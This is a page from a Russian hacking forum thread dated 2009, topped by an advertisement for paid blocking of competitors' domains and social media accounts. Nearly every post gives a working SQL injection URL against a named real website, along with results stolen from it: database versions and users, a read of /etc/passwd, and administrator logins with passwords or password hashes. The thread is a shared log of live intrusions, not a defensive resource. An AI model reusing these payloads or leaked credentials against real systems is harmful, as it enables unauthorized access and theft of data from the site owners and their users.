УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 831 из 1242

831

Опции темы

Поиск в этой теме

Опции просмотра

#8301

12.03.2009, 14:19

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://megaspace.com.br/base.php?menuId=5&categoriaPaiId=-1+union+select+1,load_file('/etc/passwd'),3/*

Кратко и ясно =)

#8302

12.03.2009, 14:40

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

http://avers33.ru

http://avers33.ru/view_articles.php?id=-47'+union+select+1,2,3,4,5,6,version(),8,9,10,11,1 2,13,14--+
Database Version:5.0.37
Login: planer
password:

email: m-planer@mail.ru
Database name: avers33ru

#8303

12.03.2009, 15:28

+++AndreyDevil+++

Участник форума

Регистрация: 28.12.2008

Сообщений: 136

Провел на форуме:
1311435

Репутация: 90

http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('UTILIS_Stats_Browsers'))--

Database Version:Microsoft SQL Server 2005 - 9.00.1406.00
Database name:art
User name:LMYS-S01\IUSR_LMYS-S01
-----------------------------------------------------------------------
-----------------------------------------------------------------------
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('UTILIS_Stats_Browsers','UTILIS_Stats_Config','U TILIS_Stats_OSes','UTILIS_Stats_Paths','UTILIS_Sta ts_Refs','UTILIS_Stats_Stats','Content','Dealers', 'Distributors','FAQ','FAQ_Sections','File_Categori es','Files','Friends','Misc_Content','Press_Releas es','Product_Categories','Product_Models','Product _Types','Reviews','Specs_ARTcessories','Specs_Audi o_Utilities','Specs_Crossovers','Specs_Digital_Con verters','Specs_Direct_Boxes','Specs_DSP','Specs_E ffects_Processors','Specs_Graphic_EQ','Specs_Mic_P aks','Specs_Mic_Preamps','Specs_Power_Amps','Specs _Power_Conditioners','Specs_Studio_Monitors','Spec s_Tube_Compressors','Splash_Content','Splash_Intro s','UTILIS_Access_Level','UTILIS_Config','UTILIS_M ail_Categories','UTILIS_Mail_Clients','UTILIS_Mail ing_List','UTILIS_Permissions','UTILIS_Preferences ','UTILIS_Users'))--
-----------------------------------------------------------------------
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+User_name+fro m+UTILIS_Users)--
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+password+from +UTILIS_Users)--
-----------------------------------------------------------------------

'whelman' 'YXN0cmFs'

#8304

12.03.2009, 15:40

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

Провел на форуме:
3009843

Репутация: 204

Странно(=.

Код:

http://budutdeti.ru/php/content.php?group=3&id=-79+union+select+1,concat_ws(0x3a,pass,login),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users+--+

о_О

Код:

2:1

#8305

12.03.2009, 16:24

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.primariacurtici.ro/?x=arata_articol&id=-220+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9

Database Version: 4.1.22-standard-log
Database name: primaria_curtici
User name: primaria_curtici@localhost

#8306

12.03.2009, 18:15

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

Провел на форуме:
3659973

Репутация: 466

Отправить сообщение для Rubaka с помощью ICQ

http://www.frndz.biz/page.php?ID=-5+union+select+1,2/*

Database Version: 4.1.22-standard
Database name: signdrop_FRNDZ
User name: signdrop_frndz@localhost

#8307

12.03.2009, 18:16

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.primariagiarmata.ro/stiri_view.php?ID=-7+union+select+1,version(),database(),user()

Database Version: 4.1.22-standard
User name: domvisio_giarmata
User name: domvisio_giarmat@localhost

#8308

12.03.2009, 18:23

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

Код:

http://www.andrewjones.com.au/media.centre/calendar/event.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--

версия/юзер/бд:

Код:

 5.0.67-community-log:netcon_cmsuser@localhost:netcon_cms

-----------------------------------------------------------------------------------------------------------------------------
The End!

#8309

12.03.2009, 18:46

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

auction.mxc.ru

PHP код:


		
			
http://auction.mxc.ru/?chap=viewgood&id=275+union+select+1,2,3,concat_ws(0x3A,@@version,user(),database()),5--+

5.0.32-Debian_7etch6-log
auction_user@localhost
auction_mxc_ruр

www.truck.ru PR-4 ТиЦ - 650

PHP код:


		
			
http://www.truck.ru/statiy.php?art=-8589+union+select+1,2,3,concat_ws(0x3A,username,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+truck.phpbb_users+where+user_level=1+--+

админ(хеш так и не побрутил):
x86:d71fcaf80885603f64d1648b509438b3

6 Версия мускуля, впервые встречаю в живой природе-

PHP код:


		
			
http://sorter.ru/popup_mes.cph?idmes=496260+union+select+concat_ws(0x3A,user(),version(),database())--+

SORTER@LOCALHOST
6.0.9-ALPHA-LOG
SORTER_ANNOUN

Последний раз редактировалось AkyHa_MaTaTa; 12.03.2009 в 19:21..

#8310

12.03.2009, 18:57

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Код:

http://www.irmca.org/memberinfo.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14--

версия/юзер/бд:

Код:

 4.0.12-nt:admin_irmca@localhost:irmca_org_-_content

----------------------------------------------------------------------

Код:

http://www.plm-conference.org/index.php?section=-1+union+all+select+0,1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13--

версия/юзер/бд:

Код:

5.0.32-Debian_7etch1:plmconfe66633@217.64.195.223:plmconfe66633

вывод в <title></title>

-----------------------------------------------------------------------------------------------------------------------------
The End!

Последний раз редактировалось -m0rgan-; 12.03.2009 в 19:02..

Страница 831 из 1242

831

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход